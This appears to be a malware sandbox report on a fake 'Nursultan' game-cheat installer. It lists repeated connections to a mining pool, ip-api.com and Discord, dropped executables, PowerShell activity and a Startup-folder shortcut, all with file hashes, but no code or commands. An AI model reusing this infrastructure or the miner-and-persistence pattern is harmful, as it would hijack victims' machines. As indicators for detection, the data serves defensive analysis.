US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
US 8.8.8.8:53 discord.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp

Files

memory/5084-0-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp

memory/5084-1-0x00000000002D0000-0x00000000005D0000-memory.dmp

memory/3664-6-0x000002911B950000-0x000002911B972000-memory.dmp

memory/3664-9-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/3664-10-0x000002911BB00000-0x000002911BB76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdahk0qu.3sg.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3664-23-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/3664-40-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/3664-45-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/3664-48-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/3664-52-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/5084-53-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

MD5 a1d8db2a1ff742bc73dd5617083f5fde
SHA1 957b182d82efb40a36099dd886ad581977880838
SHA256 d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a
SHA512 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb5eacf23b5670f4fa1c1f1f182cccbd
SHA1 ea58bfa70b2b08830bcd26476817270b3682a430
SHA256 8863df312c68b9a1ffb8f353e0c924c24627a3b24c82ce7813d6c803cd46e055
SHA512 6502abcf42f8cd2613cae3a9a274f7ebd206ba6fe99f4f8737068b879e0a5fcf1043ab24838c446f66180ab1e4555ba685405d851df7af2fa76dee2909ae22a0

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

MD5 f0b33cc162bfd36a995b8c90cd8ebff1
SHA1 ca1ddef08d47fc15a44a2d651b61e3decce8ebc6
SHA256 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0
SHA512 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

memory/4640-108-0x0000016CF4250000-0x0000016CF4290000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa7789f06e8c7ac9de0a8d354fe73c36
SHA1 b5c1416e3796b626b37376b01bee5a78377fef62
SHA256 f33b0edc13ddf3de92b378b9172ac3c3fbce5ff7c39526198df5a5217f2ff969
SHA512 23471cfbe52f0c20d4fe8a78cc27f0881fbb85d71daa08a4838575e6b55e914afbd6b12f35e185d93669563fd1e58b1796e86358cd7ec1e06b1d85408a68185a

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

MD5 0df0a039309525fd27e1b5e056c92b6a
SHA1 7551c27a9123cb56c4218647966a753794ac2961
SHA256 a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f
SHA512 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CrackLauncher.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

memory/5084-164-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40bb4af5da3e37a79b12f1f9131ca98b
SHA1 3a91696a201b3ae64e848540c491045b305d01be
SHA256 0c95845af4be27e576caf38052949c242b620a46a4a486f78c0d4c8848e8e9e2
SHA512 fe278cae8b6d2697b152787120d943dfcddb15b99186d183b12a09a34e59120cd641bd931022952bd9f65537ad1b4b1502247b37c7db39ec81c56ab97ba26380

memory/2224-169-0x00000000001D0000-0x00000000003B8000-memory.dmp

memory/2224-204-0x0000000004CC0000-0x0000000004D5C000-memory.dmp

memory/2224-211-0x0000000005910000-0x0000000005E0E000-memory.dmp

memory/2224-215-0x0000000005450000-0x0000000005506000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fdc146a87c4ca23cf20fd0e49ee6edfe
SHA1 100007fee5bdad35e127715be6b07962c590172c
SHA256 202089ca2033710ada8aa084a108c45206d943a4ca93e5295877c7d50a0691a2
SHA512 962db3659935b5423312733a6adf9482a88d71e3bb389c67417c81dd8376cab8a426682408d8b5701a1aae6b877457bbc96509fee352174de0e5bdbf8fe4bac9

memory/2540-218-0x0000000000400000-0x0000000000412000-memory.dmp

memory/4640-244-0x0000016CF69E0000-0x0000016CF6A30000-memory.dmp

memory/4640-245-0x0000016CF68E0000-0x0000016CF68FE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a81bfea3b920aa3d0714bf0c54b9e53f
SHA1 951c047d70259ba1bc756891a304d22323af5929
SHA256 1574cf0098005f7c1af512437dacbf94603c6afb1d9222a9deea9f71ad6c05bc
SHA512 d504b9c7e66c034ede3887dae9ff27462ea8720dbdf7c6a2b18bff451383300cc5eb09c0d73808116f78a58d3f9c92038c23c68af4286256d8bae3c0e524391f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 43c6a1375f4bc8aa4b6f70366450718b
SHA1 1c64d0b8aca9b35abf192c19e1daacafc731909f
SHA256 d1d5f546cd6d2081541e09016607a38bb7f17b0411dd26328df623a027ea453c
SHA512 25fd0a98858f9fe2c7e6ba1ad08b009509d4b6a609c0a95845757c8eb5766f539af6e50670148914714e186e59276b69fbf8773175b44069d315bb650c90700b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40b1b022395bb1806b056529ba700ed0
SHA1 d5f4277709164300a24e2d9e5bc1841710c7721c
SHA256 43165377505b16fe09b166c0e228103f1f6ea0123d6ae9ea68640f783c53f925
SHA512 57a21714bd40d71f9c2b27bf1d366290dac64a9f5da9d83b79ecf4b05127ca28a244f3625f9e81b097eb78eef64bca2629d890b252fa354ad17d25e1a47bc072

memory/4640-322-0x0000016CF6920000-0x0000016CF6932000-memory.dmp

memory/4640-321-0x0000016CF5FB0000-0x0000016CF5FBA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c605b5c0c7a2c0f9c5e3555dfeb7c693
SHA1 bba0ba9c777f5efc131cea9ab4a967492690fc68
SHA256 28f337ef3f7be9f240c58144ede222ee5aafddd548433bdcc1009ee0fcd7dc8c
SHA512 4f7f7728eb46fbdd496e6928e99f923cc86df74a784a0d7f388db36e20391a03972f55906834b758f01a78aad5d994ce3c6c3c0de5923e961ddb6522eb03dabe

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c00b909f2425c12ec5a32236c709edb6
SHA1 fadeffe18285fe4984e45f9e840d70dfcb743afe
SHA256 0d90c6899a678e199f27b6d01d039a007ce21e33268b91614b54f0a7dcd4b7e2
SHA512 27d9070fe458c409487f54cc9664754d7f63417e9cd84c7100bbc57439b5fcf9da8940b03a964dad81bba131d4b39a108465aa1c7f76f0e8a69ee8603d2c75a0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d42de71e417030a1502a93bc706949d6
SHA1 9e5856ecd51d61be467774c424607d7ea2b1a489
SHA256 72b6ee186d6861ac30f4e81c2f5e71036491ef21e293380c76e55945a19b46a5
SHA512 20286d4d6526bdebce82108cbe94911e191f7f45c75922e89979b8d5d5e746f37bcec191bd0c6f6cdaa5af92135fe6a733b6f8130c33e9c8febfa6b792918137

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nursultan.exe.log

MD5 5eb78694a01d4921f891d9d3e8c56a28
SHA1 50099d205cb1417521e4bbb42c47eb758c28d624
SHA256 c77a34aed5989d22f5fdfb0409a20b451d57cefad887c26e793ebeb970de845a
SHA512 4c8d3037ea4de3827975f95ebb894b0fb6bd659b22bbbd7abf8c507724cf0a74bf7e290c67f1ba6f9ca756b5599165a0f35dfb36a7f62cf29e8dd46332eeee86

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk

MD5 dc5e6de203ffc16cad1e4a8f390bda8a
SHA1 7c92e9f3d3fbba533167ac1cb885182a3f1ff758
SHA256 c7dba667c2d6cbc91791acc00d4cc880f4e861ef4b6ef57041c08ce8ef692157
SHA512 c99a3bab4c6d9e6168b7f8e1d14ffce6e037a2659288116fefbf3a4a81fd221aef9bca1b049effe22693a433979c8554c95f5c89c0946d91f903572da5178759

memory/2076-488-0x00000000071E0000-0x0000000007216000-memory.dmp

memory/2076-489-0x0000000007950000-0x0000000007F78000-memory.dmp

memory/2076-490-0x0000000007900000-0x0000000007922000-memory.dmp

memory/2076-491-0x00000000081D0000-0x0000000008236000-memory.dmp

memory/2076-492-0x0000000008240000-0x00000000082A6000-memory.dmp

memory/2076-493-0x00000000082B0000-0x0000000008600000-memory.dmp

memory/2076-495-0x0000000008150000-0x000000000816C000-memory.dmp

memory/2076-496-0x00000000086F0000-0x000000000873B000-memory.dmp

memory/2076-497-0x00000000089F0000-0x0000000008A66000-memory.dmp

memory/2076-514-0x0000000009AA0000-0x0000000009AD3000-memory.dmp

memory/2076-515-0x000000006FC20000-0x000000006FC6B000-memory.dmp

memory/2076-516-0x0000000009A60000-0x0000000009A7E000-memory.dmp

memory/2076-521-0x0000000009BD0000-0x0000000009C75000-memory.dmp

memory/2076-522-0x0000000009DA0000-0x0000000009E34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Запустить Nursultan.exe.log

MD5 19fa667a538a7330e0784409cd460887
SHA1 48f1f0a7efd3404dfc38feb106c107ce259382cc
SHA256 45872ce54fd391ad3744d35486e135c692867aef1e1fe897fe9d7ab174948fbf
SHA512 0f9fa8e0342184fde1359ca2cb31a31c65accbe1af8bdd12d41c389b2c32b5410faf7915580aeac62edda9bb5b857c80ce4b6e44608abc123b6eb3400e329dd4

memory/2076-756-0x0000000009D40000-0x0000000009D5A000-memory.dmp

memory/2076-763-0x0000000009D30000-0x0000000009D38000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 152ac3885a85a8c99ef1527a53942211
SHA1 1dfdd544e9ed1980e80f68317738670dd94e652d
SHA256 bbcdc3dad34885ac663ab89b17f6ba1efe318f3bf08eae9910bf6ba66b6f41aa
SHA512 65aa235d55ae56208a12b0a1740d50fa7346fb079244b190d944fab089dd87b809a160aebd4e7edc8c64bb9fecc991624cc4df73e6298bc2cdbed18bf10e7c20

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
